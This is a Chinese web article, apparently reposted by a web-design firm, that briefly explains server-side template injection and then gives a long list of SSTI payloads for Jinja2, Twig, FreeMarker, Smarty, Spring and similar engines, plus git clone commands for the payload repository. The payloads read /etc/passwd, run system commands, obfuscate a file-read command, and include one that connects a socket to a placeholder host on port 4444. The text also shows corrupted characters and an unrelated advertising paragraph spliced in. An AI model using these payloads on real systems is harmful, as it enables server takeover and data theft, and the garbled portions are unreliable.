小編給大家分享一下SSTI-Payloads的示例分析�����,相信大部分人都還不怎么了解��,因此分享這篇文章給大家參考一下�,希望大家閱讀完這篇文章后大有收獲��,下面讓我們一起去了解一下吧����!
為富川等地區(qū)用戶提供了全套網(wǎng)頁設計制作服務,及富川網(wǎng)站建設行業(yè)解決方案����。主營業(yè)務為成都網(wǎng)站設計�、成都網(wǎng)站建設、富川網(wǎng)站設計����,以傳統(tǒng)方式定制建設網(wǎng)站,并提供域名空間備案等一條龍服務���,秉承以專業(yè)��、用心的態(tài)度為用戶提供真誠的服務���。我們深信只要達到每一位用戶的要求�,就會得到認可�����,從而選擇與我們長期合作��。這樣�����,我們也可以走得更遠����!
所謂服務器端模板注入技術,指的是攻擊者能夠使用本機模板語法將Payload注入到一個模板之中�,然后再在服務器端執(zhí)行。服務器模板注入 (SSTI ) 是一種利用公共 Web 框架的服務器端模板作為攻擊媒介的攻擊方式���,該攻擊利用了嵌入模板的用戶輸入方式的弱點��,除此之外SSTI 攻擊還可以用來找出 Web 應用程序的內容結構��。
根據(jù)技術設計實現(xiàn)����,模板引擎能夠結合固定模板和動態(tài)數(shù)據(jù)來生成特定的網(wǎng)頁。如果用戶的輸入數(shù)據(jù)直接與模板內容相連接�,而不是作為數(shù)據(jù)參數(shù)直接傳入的話,就有可能發(fā)生服務器端模板注入攻擊了��。此時�,攻擊者將能夠通過注入任意模板指令來對模板引擎進行惡意操作,一般來說����,這將導致攻擊者獲取到目標網(wǎng)絡服務器的完整控制權。也就是說�,服務器端模板注入Payload需要在目標服務器上進行部署和使用,這將使它們比一般的客戶端模板注入漏洞更加嚴重�����。
漏洞影響
服務器端模板注入漏洞會使網(wǎng)站面臨各種攻擊和安全風險���,具體取決于所討論的模板引擎以及應用程序如何使用它���。在某些罕見的情況下,這些漏洞不會帶來真正的安全風險�����。然而����,大多數(shù)情況下,服務器端模板注入的影響可能是災難性的�����。
如果在某些嚴重情況下�����,攻擊者可以在目標服務器上實現(xiàn)遠程代碼執(zhí)行�����,完全控制后端服務器��,并使用它來對網(wǎng)絡內部基礎結構執(zhí)行下一步攻擊�。
即使在不可能完全執(zhí)行遠程代碼的情況下����,攻擊者通常仍可以使用服務器端模板注入作為許多其他攻擊的跳板�����,從而可能獲得對服務器上敏感數(shù)據(jù)和任意文件的讀取訪問權限���。
Payload集
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}{{ key|e }}{{ value|e }}{% endfor %}
{{'a'.toUpperCase()}}
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Payload下載
廣大研究人員可以使用下列命令將現(xiàn)有Payload集克隆至本地(HTTPS):
root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git
廣大研究人員可以使用下列命令將現(xiàn)有Payload集克隆至本地(SSH):
root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git
以上是“SSTI-Payloads的示例分析”這篇文章的所有內容��,感謝各位的閱讀���!相信大家都有了一定的了解,希望分享的內容對大家有所幫助��,如果還想學習更多知識��,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道�����!
當前題目:SSTI-Payloads的示例分析
URL分享:
http://weahome.cn/article/pjchge.html
重慶分公司
重慶分公司
